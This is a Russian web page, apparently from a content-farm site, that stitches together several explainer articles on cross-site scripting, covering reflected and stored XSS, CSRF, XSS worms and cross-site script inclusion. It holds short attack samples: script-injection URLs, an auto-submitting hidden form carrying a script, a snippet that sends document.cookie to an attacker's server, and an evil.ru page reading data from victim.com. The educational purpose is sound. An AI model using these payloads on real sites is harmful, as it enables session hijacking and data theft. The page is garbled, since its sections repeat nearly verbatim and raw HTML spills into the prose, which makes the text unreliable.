Такое xss атака. XSS уязвимость — что это? Примеры XSS уязвимостей

29.03.2020

Что такое XSS и как от него защитится все уже давно знают, поэтому буду краток. XSS это возможность злоумышленника определенным образом (ссылку на возможные варианты смотрите в конце статьи) интегрировать в страницу сайта-жертвы скрипт, который будет выполнен при ее посещении.

Интересно, что в большинстве случаев, где описывается данная уязвимость, нас пугают следующим кодом:

http://www.site.com/page.php?var=<script>alert("xss");

Как-то не очень страшно:) Чем же действительно может быть опасной данная уязвимость?

Пассивная и активная

Существует два типа XSS уязвимостей - пассивная и активная.

Активная уязвимость более опасна, поскольку злоумышленнику нет необходимости заманивать жертву по специальной ссылке, ему достаточно внедрить код в базу или какой-нибудь файл на сервере. Таким образом, все посетители сайта автоматически становятся жертвами. Он может быть интегрирован, например, с помощью внедрения SQL-кода (SQL Injection). Поэтому, не стоит доверять данным, хранящимся в БД, даже если при вставке они были обработаны.

Пример пассивной уязвимости можно посмотреть в самом начале статьи. Тут уже нужна социальная инженерия, например, важное письмо от администрации сайта с просьбой проверить настройки своего аккаунта, после восстановления с бэкапа. Соответственно, нужно знать адрес жертвы или просто устроить спам-рассылку или разместить пост на каком-нибудь форуме, да еще и не факт что жертвы окажутся наивными и перейдут по вашей ссылке.

Причем пассивной уязвимости могут быть подвержены как POST так и GET-параметры. С POST-параметрами, понятно, придется идти на ухищрения. Например, переадресация с сайта злоумышленника.

">

Следовательно, GET-уязвимость чуть более опасна, т.к. жертве легче заметить неправильный домен, чем дополнительный параметр (хотя url можно вообще закодировать).

Кража Cookies

Это наиболее часто приводимый пример XSS-атаки. В Cookies сайты иногда хранят какую-нибудь ценную информацию (иногда даже логин и пароль (или его хэш) пользователя), но самой опасной является кража активной сессии, поэтому не забываем нажимать ссылку «Выход» на сайтах, даже если это домашний компьютер. К счастью, на большинстве ресурсов время жизни сессии ограничено.

var іmg = new Image(); іmg.srс = "http://site/xss.php?" + document.cookie;

Поэтому и ввели доменные ограничения на XMLHttpRequest, но злоумышленнику это не страшно, поскольку есть , <img>, <script>, background:url(); и т.п.</p><h3>Кража данных из форм</h3><p>Ищем форму через, например, getElementById и отслеживаем событие onsubmit. Теперь, перед отправкой формы, введенные данные отправляются также и на сервер злоумышленника.</p><p>Этот тип атаки чем-то напоминает фишинг, только используется не поддельный сайт, а реальный, чем вызывается большее доверие жертвы.</p><h3>DDoS-атака (распределенная атака типа «отказ в обслуживании»)</h3><p>XSS-уязвимость на многопосещаемых ресурсах может быть использована для проведения DDoS-атаки. Суть проста - много запросов, которые не выдерживает атакуемый сервер.<br> Собственно отношение к XSS имеет косвенное, поскольку скрипты могут и не использоваться вовсе, достаточно конструкции вида:</p><h3>Подделка межсайтовых запросов (CSRF/XSRF)</h3><p>Также имеет косвенное отношение к XSS. Вообще это отдельный тип уязвимости, но часто используется совместно с XSS. Суть заключается в том, что пользователь, авторизированный на неуязвимом сайте, заходит на уязвимый (или специальную страницу злоумышленника), с которого отправляется запрос на совершение определенных действий.</p><p>Грубо говоря, в идеале это должно быть так. Пользователь авторизировался в системе платежей. Потом зашел на сайт злоумышленника или сайт с XSS-уязвимостью, с которого отправился запрос на перевод денег на счет злоумышленника.</p><p>Поэтому большинство сайтов при совершении определенных действий пользователя (например, смена e-mail) переспрашивают пароль или просят ввести код подтверждения.</p><h3>XSS-черви</h3><p>Этот тип атаки появился, наверное, благодаря соцсетям, таким как Вконтакте и Twitter. Суть в том, что нескольким пользователям соцсети посылается ссылка с XSS-уязвимостью, когда они перейдут по ссылке, то интегрированный скрипт рассылает сообщения другим пользователям от их имени и т.д. При этом могут совершаться и другие действия, например отсылка личных данных жертв злоумышленнику.</p><h3>Безобидный XSS</h3><p>Интересно, что счетчики по своей сути тоже являются в некотором роде активной XSS-атакой. Ведь на сторонний сервер передаются данные о посетителе, как, например, его IP-адрес, разрешение монитора и т.п. Только код в свою страничку вы интегрируете по собственной воле:) Взгляните, например, на код Google Analytic.</p> <p>Что такое XSS-уязвимость? Стоит ли ее опасаться?</p> <p>Межсайтовый скриптинг (сокращенно XSS) - широко распространенная уязвимость, затрагивающая множество веб-приложений. Она позволяет злоумышленнику внедрить вредоносный код в веб-сайт таким образом, что браузер пользователя, зашедшего на сайт, выполнит этот код.</p> <p>Обычно для эксплуатации подобной уязвимости требуется определенное взаимодействие с пользователем: либо его заманивают на зараженный сайт при помощи социальной инженерии, либо просто ждут, пока тот сам посетит данный сайт. Поэтому разработчики часто не воспринимают всерьез XSS-уязвимости. Но если их не устранять, это может нести серьезную угрозу безопасности.</p> <p>Представим, что мы находимся в панели администратора WordPress, добавляем новый контент. Если мы используем для этого уязвимый к XSS плагин, он может заставить браузер создать нового администратора, видоизменить контент и выполнить другие вредоносные действия.</p> <p>Межсайтовый скриптинг предоставляет злоумышленнику практически полный контроль над самым важным <a href="/licenzionnoe-soglashenie-ob-usloviyah-ispolzovaniya.html">программным обеспечением</a> в наши дни - браузером.</p> <h2> XSS: Уязвимость для инъекции</h2> <p>Любой веб-сайт или приложение имеет несколько мест ввода данных -полей формы до самого URL. <a href="/uroki-po-programmirovaniyu-mikrokontrollerov-avr-osnovy-yazyka-si-dlya-mikrokontrollerov-avr-v-etom-u.html">Простейший пример</a> вводимых данных - когда мы вписываем имя пользователя и пароль в форму:</p> <p><b>Рисунок 1. Форма ввода данных </b></p> <p>Наше имя будет храниться в базе данных сайта для последующего взаимодействия с нами. Наверняка, когда вы проходили авторизацию на каком-либо сайте, вы видели персональное приветствие в стиле «Добро пожаловать, Илья». Именно для таких целей имена пользователей хранятся в базе данных.</p> <p>Инъекцией называется процедура, когда вместо имени или пароля вводится специальная последовательность символов, заставляющая сервер или браузер отреагировать определенным, нужным злоумышленнику образом.</p> <p>Межсайтовым скриптингом называется инъекция, внедряющая код, который будет выполнять действия в браузере от имени веб-сайта. Это может происходить как с уведомлением пользователя, так и в фоновом режиме, без его ведома.</p> <p><b>Рисунок 2. Наглядная схема межсайтового скриптинга </b></p> <p><img src='https://i1.wp.com/anti-malware.ru/files/xss-example-flow-diagram1.png' width="100%" loading=lazy></p> <p>В качестве простейшего примера можно привести элементарный скрипт, показывающий окно с уведомлением. Выглядит он примерно так:</p> <p><b>Таблица 1. Скрипт, вызывающий всплывающее окно </b></p> <p><script>alert(" ЭТО <span>XSS- </span>УЯЗВИМОСТЬ !!!")</script> </p> <p>Данный скрипт вызывает окно с надписью «ЭТО XSS-УЯЗВИМОСТЬ!!!». Браузер пользователя воспринимает и выполняет этот скрипт как часть легитимного кода сайта.</p> <h2> Типы XSS-уязвимостей</h2> <p>Не все уязвимости XSS одинаковы, их существует множество типов. Здесь перечислены типы и способы их взаимодействия:</p> <p><b>Рисунок 3. Типы XSS-уязвимостей </b></p> <p><b><br><img src='https://i2.wp.com/anti-malware.ru/files/sucuri-blog-xss-types.png' width="100%" loading=lazy></b></p> <p><b>Уязвимости, вызванные кодом на стороне сервера (Java, PHP, .NET и т. д.): </b></p> <p>Традиционные XSS-атаки:</p> <ol><li>Отраженные (непостоянные). Отраженная XSS-атака срабатывает, когда пользователь переходит по специально подготовленной ссылке. Эти уязвимости появляются, когда данные, предоставленные веб-клиентом, чаще всего в параметрах HTTP-запроса или в форме HTML, исполняются непосредственно серверными скриптами для синтаксического анализа и отображения страницы результатов для этого клиента, без надлежащей обработки.</li> <li>Хранимые (постоянные). Хранимые XSS возможны, когда злоумышленнику удается внедрить на сервер вредоносный код, выполняющийся в браузере каждый раз при обращении к оригинальной странице. Классическим примером этой уязвимости являются форумы, на которых разрешено оставлять комментарии в HTML-формате.</li> </ol><p><b>Уязвимости, вызванные кодом на стороне клиента (JavaScript, Visual Basic, Flash и т. д.): </b></p> <p>Также известные как DOM-модели:</p> <ol><li>Отраженные (непостоянные). То же самое, что и в случае с серверной стороной, только в этом случае атака возможна благодаря тому, что код обрабатывается браузером.</li> <li>Хранимые (постоянные). Аналогичны хранимым XSS на стороне сервера, только в этом случае вредоносная составляющая сохраняется на клиентской стороне, используя хранилище браузера.</li> </ol><p><b>Уязвимости, вызванные инфраструктурой (браузер, плагины, сервера и т. д.): </b></p> <p>Встречаются очень редко, но являются более опасными:</p> <ol><li>Инфраструктура на стороне клиента. Происходит, когда вредоносная составляющая производит какие-либо манипуляции с функционалом браузера, например с его XSS-фильтром и т.п.</li> <li>Инфраструктура на стороне сервера. Возникает, когда веб-сервер некорректно обрабатывает запросы, позволяя модифицировать их.</li> <li>Сеть. Происходит, когда возможно внедриться в связь между клиентом и сервером.</li> </ol><p><b>Уязвимости, вызванные пользователем: </b></p> <ol><li>Само-XSS. Часто происходит в результате социальной инженерии, когда пользователь случайно запускает вредоносный код в своем браузере.</li> </ol><h2> В чем опасность XSS?</h2> <p>Как можно защитить свой сайт от XSS? Как проверить код на наличие уязвимости? Существуют технологии вроде Sucuri Firewall, специально разработанные для того, чтобы избежать подобных атак. Но если вы разработчик, вы, безусловно, захотите узнать подробнее, как идентифицировать и устранить XSS-уязвимости. Об этом мы поговорим в следующей части статьи, посвященной XSS.</p> <p>Межсайтовый скриптинг (сокращенно XSS) - широко распространенная уязвимость, затрагивающая множество веб-приложений. Она позволяет злоумышленнику внедрить вредоносный код в веб-сайт таким образом, что браузер пользователя, зашедшего на сайт, выполнит этот код.</p> <p>Обычно для эксплуатации подобной уязвимости требуется определенное взаимодействие с пользователем: либо его заманивают на зараженный сайт при помощи социальной инженерии, либо просто ждут, пока тот сам посетит данный сайт. Поэтому разработчики часто не воспринимают всерьез XSS-уязвимости.</p> <p>Но если их не устранять, это может нести серьезную угрозу безопасности.</p> <p>Представим, что мы находимся в панели администратора WordPress, добавляем новый контент. Если мы используем для этого уязвимый к XSS плагин, он может заставить браузер создать нового администратора, видоизменить контент и выполнить другие вредоносные действия. Межсайтовый скриптинг предоставляет злоумышленнику практически полный контроль над самым важным программным обеспечением в наши дни - браузером.</p> <h2>XSS: Уязвимость для инъекции</h2> <p>Любой веб-сайт или приложение имеет несколько мест ввода данных -полей формы до самого URL. Простейший пример вводимых данных - когда мы вписываем имя пользователя и пароль в форму:</p> <p><img src='https://i1.wp.com/info-business.pro/wp-content/uploads/2017/01/screen-shot.png' align="center" width="100%" loading=lazy></p> <p>Наше имя будет храниться в базе данных сайта для последующего взаимодействия с нами. Наверняка, когда вы проходили авторизацию на каком-либо сайте, вы видели персональное приветствие в стиле «Добро пожаловать, Илья».</p> <p>Именно для таких целей имена пользователей хранятся в базе данных.</p> <p>Инъекцией называется процедура, когда вместо имени или пароля вводится специальная последовательность символов, заставляющая сервер или браузер отреагировать определенным, нужным злоумышленнику образом.</p> <p>Межсайтовым скриптингом называется инъекция, внедряющая код, который будет выполнять действия в браузере от имени веб-сайта. Это может происходить как с уведомлением пользователя, так и в фоновом режиме, без его ведома.<br><br><img src='https://i1.wp.com/info-business.pro/wp-content/uploads/2017/01/xss-example-flow-diagram1.png' align="center" width="100%" loading=lazy></p> <h2>Традиционные XSS-атаки:</h2> <h4>Отраженные (непостоянные).</h4> <p>Отраженная XSS-атака срабатывает, когда пользователь переходит по специально подготовленной ссылке.</p> <p>Эти уязвимости появляются, когда данные, предоставленные веб-клиентом, чаще всего в параметрах HTTP-запроса или в форме HTML, исполняются непосредственно серверными скриптами для синтаксического анализа и отображения страницы результатов для этого клиента, без надлежащей обработки.</p> <h4>Хранимые (постоянные).</h4> <p>Хранимые XSS возможны, когда злоумышленнику удается внедрить на сервер вредоносный код, выполняющийся в браузере каждый раз при обращении к оригинальной странице. Классическим примером этой уязвимости являются форумы, на которых разрешено оставлять комментарии в HTML-формате.</p> <h2>Уязвимости, вызванные кодом на стороне клиента (JavaScript, Visual Basic, Flash и т. д.):</h2> <h3>Также известные как DOM-модели:</h3> <h4>Отраженные (непостоянные).</h4> <p>То же самое, что и в случае с серверной стороной, только в этом случае атака возможна благодаря тому, что код обрабатывается браузером.</p> <h4>Хранимые (постоянные).</h4> <p>Аналогичны хранимым XSS на стороне сервера, только в этом случае вредоносная составляющая сохраняется на клиентской стороне, используя хранилище браузера.</p> <h2>Примеры XSS уязвимостей.</h2> <p>Интересно, что в большинстве случаев, где описывается данная уязвимость, нас пугают следующим кодом:</p><p>Http://www.site.com/page.php?var=<script>alert("xss");</script> </p><p>Существует два типа XSS уязвимостей - пассивная и активная.</p> <p><i>Активная уязвимость </i> более опасна, поскольку злоумышленнику нет необходимости заманивать жертву по специальной ссылке, ему достаточно внедрить код в базу или какой-нибудь файл на сервере. Таким образом, все посетители сайта автоматически становятся жертвами. Он может быть интегрирован, например, с помощью внедрения SQL-кода (SQL Injection). Поэтому, не стоит доверять данным, хранящимся в БД, даже если при вставке они были обработаны.</p> <p>Пример <i>пассивной уязвимости </i> можно посмотреть в самом начале статьи. Тут уже нужна социальная инженерия, например, важное письмо от администрации сайта с просьбой проверить настройки своего аккаунта, после восстановления с бэкапа. Соответственно, нужно знать адрес жертвы или просто устроить спам-рассылку или разместить пост на каком-нибудь форуме, да еще и не факт что жертвы окажутся наивными и перейдут по вашей ссылке.</p> <p>Причем пассивной уязвимости могут быть подвержены как POST так и GET-параметры. С POST-параметрами, понятно, придется идти на ухищрения. Например, переадресация с сайта злоумышленника.</p><p> <form method="post" action="http://site.com/page.php"> </p><p><input type="hidden" name="var" value="<script>alert("xss")</script>"></p> <p><script type="text/javascript"> document.getElementsByTagName("form").submit(); </script></p> <p>Следовательно, GET-уязвимость чуть более опасна, т.к. жертве легче заметить неправильный домен, чем дополнительный параметр (хотя url можно вообще закодировать).</p> <h3>Кража Cookies</h3> <p>Это наиболее часто приводимый пример XSS-атаки. В Cookies сайты иногда хранят какую-нибудь ценную информацию (иногда даже логин и пароль (или его хэш) пользователя), но самой опасной является кража активной сессии, поэтому не забываем нажимать ссылку «Выход» на сайтах, даже если это домашний компьютер. К счастью, на большинстве ресурсов время жизни сессии ограничено.</p><p>Var іmg = new Image(); іmg.srс = "http://site/xss.php?" + document.cookie; </p><p>Поэтому и ввели доменные ограничения на XMLHttpRequest, но злоумышленнику это не страшно, поскольку есть <iframe>, <img>, <script>, background:url(); и т.п.</p> <h3>Кража данных из форм</h3> <p>Ищем форму через, например, getElementById и отслеживаем событие onsubmit. Теперь, перед отправкой формы, введенные данные отправляются также и на сервер злоумышленника.</p> <p>Этот тип атаки чем-то напоминает фишинг, только используется не поддельный сайт, а реальный, чем вызывается большее доверие жертвы.</p> <h3>DDoS-атака (распределенная атака типа «отказ в обслуживании»)</h3> <p>XSS-уязвимость на многопосещаемых ресурсах может быть использована для проведения DDoS-атаки. Суть проста - много запросов, которые не выдерживает атакуемый сервер.<br> Собственно отношение к XSS имеет косвенное, поскольку скрипты могут и не использоваться вовсе, достаточно конструкции вида:</p><p> <img src='https://i2.wp.com/site.com/' loading=lazy> </p><h2>В чем опасность XSS?</h2> <p>Как можно защитить свой сайт от XSS? Как проверить код на наличие уязвимости? Существуют технологии вроде Sucuri Firewall, специально разработанные для того, чтобы избежать подобных атак. Но если вы разработчик, вы, безусловно, захотите узнать подробнее, как идентифицировать и устранить XSS-уязвимости.</p> <p>Об этом мы поговорим в следующей части статьи, посвященной XSS.</p> <p>Про возможность получения различной информации со сторонних сайтов с помощью простой атаки - Cross Site Scripting Inclusion (XSSI).</p> <p>Если ты читаешь Easy Hack систематически, то, наверное, уже хорошо знаком с Same Origin Policy (SOP), мы к нему часто возвращаемся. Из-за SOP возможность взаимодействия между двумя «сайтами» очень ограничена. Но так как задача получения и оправки информации на одном сайте с другого возникает часто, то были внедрены различные методы для «смягчения» политики и организации взаимодействия. Например, такие, как CORS или crossdomain.xml. Один из более старых методов - подгрузка JavaScript с другого домена через тег <script> . SOP нас здесь ничем не ограничивает: можно указать практически произвольное месторасположение.</p><p>К примеру, есть хост атакующего evil.ru и сайт жертвы - victim.com. На evil.ru мы можем положить файл HTML и сослаться на любой скрипт у жертвы:</p><p> <script src="http://victim.com/any_script_.js"></script> </p><p>При входе пользователя на сайт атакующего браузер подгрузит и запустит JS с victim.com, но в контексте SOP evil.ru. Это значит, что из JS самого атакующего мы сможем получить доступ к данным (не всем) JS с сервера жертвы.</p> <p>Например, содержимое JS c cайта-жертвы (http://victim.com/any_script_.js):</p><p>Var a = "12345"; </p><p>Тогда на сайте атакующего мы можем получить значение переменной:</p><p> <script src="http://victim.com/any_script_.js"></script> <script>console.log(a);</script> </p><p>Идея работы проста, как алюминиевый чайник.</p> <p>По сути, возможность подгружать с других сайтов статический JS несет в себе не больше проблем для сайта-жертвы, чем погрузка картинки.</p> <p>Проблемы могут возникнуть, когда JS формируется динамически, то есть когда контент JS-скрипта меняется на основании данных из cookie в зависимости от того, какой пользователь к нему обращается. Например, в JS хранится какая-то «критичная» информация: персональные сведения (email, имя пользователя на сайте-жертве) или техническая инфа (анти CSRF-токены).</p> <p>Но, как мы знаем, при подгрузке скрипта через тег <script> браузер пользователя автоматически отправляет cookie пользователя. Сложив эти факты, мы получаем возможность получать информацию о любом пользователе, который зашел на сайт атакующего и при этом залогинен на сайте-жертве.</p> <p>Что же мы можем узнать? Глобальные переменные и результаты работы глобальных функций. К сожалению, доступа к внутренним переменным/функциям нам не получить (хотя, возможно, кто-то найдет способ сделать и это).</p><p>Function test(){ return "private data frm function"; } </p><p>Такая атака выглядит возможной, но кажется, что она слишком проста и не должна быть распространенной. Этим и интересна презентация на Black Hat. Исследователи проанализировали 150 популярных сайтов и обнаружили, что в той или иной мере уязвима треть из них. Такая статистика заставляет взглянуть на проблему чуть более пристально.</p> <p>Была выявлена и еще одна закономерность. Content Security Policy становится все более распространенной. Как ты знаешь, с ней мы можем указать, с каких доменов может быть подгружен тот или иной ресурс. Например, можно сказать исполнять JS только с того же ресурса. Кроме того, лучшие практики настройки CSP подразумевают запрет на запуск inline JS (то есть кода, который находится прямо в HTML, а не подгружен из JS-файла).</p> <p>Однако перенос inline в файлы может быть сделан с костылями и на скорую руку - то есть посредством динамически генерируемых скриптов. Так как CSP никак не влияет на XSSI, мы опять-таки можем проводить наши атаки. Вот такая вот bad practice.</p> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy>");</script> </div> <div class="widget-single widget_fairy_recommend"> <div class="banner"> </div> </div> <div class="related-posts"><span class="related-title">Похожие статьи:</span> <ul class="related-list"> <li><a title="Программы для автоматического выключения компьютера" href="/vyklyuchenie-kompyutera-po-taimeru-windows-10-programma-programmy-dlya.html"><img width="230" height="145" src="/uploads/6edd01860a331dfe18e39024a2e1041c.jpg" class="attachment-related size-related wp-post-image" alt="Программы для автоматического выключения компьютера" / loading=lazy>Программы для автоматического выключения компьютера</a></li> <li><a title="Снаряжение мастера по ремонту компьютеров для работы на выезде" href="/chto-dolzhen-umet-master-po-remontu-kompyuterov-snaryazhenie.html"><img width="230" height="145" src="/uploads/6e97bcc53ee8f5087e2f09c54cdc85a9.jpg" class="attachment-related size-related wp-post-image" alt="Снаряжение мастера по ремонту компьютеров для работы на выезде" / loading=lazy>Снаряжение мастера по ремонту компьютеров для работы на выезде</a></li> <li><a title="Укв антенны своими руками Вертикальная оконная дипольная антенна" href="/chto-takoe-ukv-antenna-ukv-antenny-svoimi-rukami-vertikalnaya-okonnaya.html"><img width="230" height="145" src="/uploads/daa3983598cb2237862058f753eb062a.jpg" class="attachment-related size-related wp-post-image" alt="Укв антенны своими руками Вертикальная оконная дипольная антенна" / loading=lazy>Укв антенны своими руками Вертикальная оконная дипольная антенна</a></li> </ul> </div> </article> </main> <aside class="sidebar sidebar-right sidebar-primary widget-area" aria-label="Основной сайдбар" itemscope="itemscope" itemtype="http://schema.org/WPSideBar"> <div class="widget widget_nav_menu"> <div class="widgettitle" itemprop="name"><span>Рубрики</span></div> <div class="menu-rubriki-container"> <ul id="menu-rubriki" class="menu"> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a itemprop="url" href="/category/bilajjn/">Билайн</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a itemprop="url" href="/category/kompyuter/">Компьютер</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a itemprop="url" href="/category/megafon/">Мегафон</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a itemprop="url" href="/category/monitor/">Монитор</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a itemprop="url" href="/category/mts/">МТС</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a itemprop="url" href="/category/tele2/">Теле2</a></li> </ul> </div> </div> <div class="widget widget_fairy_recommend"> <div class="banner"> </div> </div> <div class="sticky-sidebar"> <div class="widget widget_fairy_best_posts"> </div> </div> </aside> </div> <footer class="site-footer border-top" itemscope="itemscope" itemtype="http://schema.org/WPFooter"> <nav class="footer-menu" itemscope itemtype="http://schema.org/SiteNavigationElement"> <ul id="menu-menyu-glavnoe-1" class="menu"> <li class="menu-item type-custom object-custom current-menu-item current_page_item "><a itemprop="url" href="/">Главная</a></li> <li class="menu-item type-post_type object-page "><a itemprop="url" href="/sitemap.xml">Карта сайта</a></li> <li class="menu-item type-post_type object-page "><a itemprop="url" href="">Обратная связь</a></li> </ul> </nav> <div class="site-copy"> <div class="copyright"> <p>© <span itemprop="copyrightYear">2022</span> ~ <a href="/">МТС. Билайн. Мегафон. Теле2. Новости</a> ~ </p> <p><a href="" title="Пользовательское соглашение">Пользовательское соглашение</a></p> </div> </div> <a href="#0" class="cd-top"></a> <div class="schetchik"> </div> </footer> </div> <div id="wpcp-error-message" class="msgmsg-box-wpcp warning-wpcp hideme"><span>error: </span></div> </body> </html>